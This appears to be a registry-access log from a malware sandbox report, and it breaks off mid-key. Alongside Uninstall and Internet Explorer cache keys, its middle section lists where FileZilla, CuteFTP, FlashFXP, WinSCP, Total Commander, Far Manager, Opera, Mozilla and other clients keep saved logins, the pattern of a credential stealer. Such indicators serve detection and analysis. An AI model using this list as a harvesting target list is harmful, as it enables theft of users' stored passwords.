HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{23daf363-3020-4059-b3ae-dc4ad39fed19}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83216022FF}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F83218074F0}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5ECE64C9-F5B3-4914-B1F2-23D46548B7E3}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{65AD78AD-D23D-3A1E-9305-3AE65CD522C2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3122661\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB3127233\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AB0000000001}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\UninstallString HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\DisplayName HKEY_CURRENT_USER\Software\WinRAR HKEY_CURRENT_USER\Software\WinRAR\HWID HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far Manager\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far\SavedDialogHistory\FTPHost HKEY_CURRENT_USER\Software\Far2\SavedDialogHistory\FTPHost HKEY_CURRENT_USER\Software\Far Manager\SavedDialogHistory\FTPHost HKEY_CURRENT_USER\Software\Ghisler\Windows Commander HKEY_LOCAL_MACHINE\Software\Ghisler\Windows Commander HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_LOCAL_MACHINE\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar HKEY_CURRENT_USER\Software\FlashFXP\3 HKEY_CURRENT_USER\Software\FlashFXP HKEY_CURRENT_USER\Software\FlashFXP\4 HKEY_LOCAL_MACHINE\Software\FlashFXP\3 HKEY_LOCAL_MACHINE\Software\FlashFXP HKEY_LOCAL_MACHINE\Software\FlashFXP\4 HKEY_CURRENT_USER\Software\FileZilla HKEY_CURRENT_USER\Software\FileZilla Client HKEY_LOCAL_MACHINE\Software\FileZilla HKEY_LOCAL_MACHINE\Software\FileZilla Client HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options HKEY_CURRENT_USER\Software\BPFTP HKEY_CURRENT_USER\Software\TurboFTP HKEY_LOCAL_MACHINE\Software\TurboFTP HKEY_CURRENT_USER\Software\Sota\FFFTP HKEY_CURRENT_USER\Software\Sota\FFFTP\Options HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224 HKEY_CURRENT_USER\Software\FTP Explorer\Profiles HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher HKEY_CURRENT_USER\Software\ExpanDrive\Sessions HKEY_CURRENT_USER\Software\ExpanDrive HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\FTPClient\Sites HKEY_LOCAL_MACHINE\Software\FTPClient\Sites HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites HKEY_CURRENT_USER\SOFTWARE\LeapWare HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections HKEY_CURRENT_USER\Software\Opera Software HKEY_CLASSES_ROOT\Opera.HTML\shell\open\command HKEY_CURRENT_USER\Software\AceBIT HKEY_LOCAL_MACHINE\Software\AceBIT HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C} HKEY_CURRENT_USER\Software\Mozilla HKEY_LOCAL_MACHINE\Software\Mozilla HKEY_CURRENT_USER\Software\LeechFTP HKEY_CLASSES_ROOT\CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016040520160406\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\filename.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet 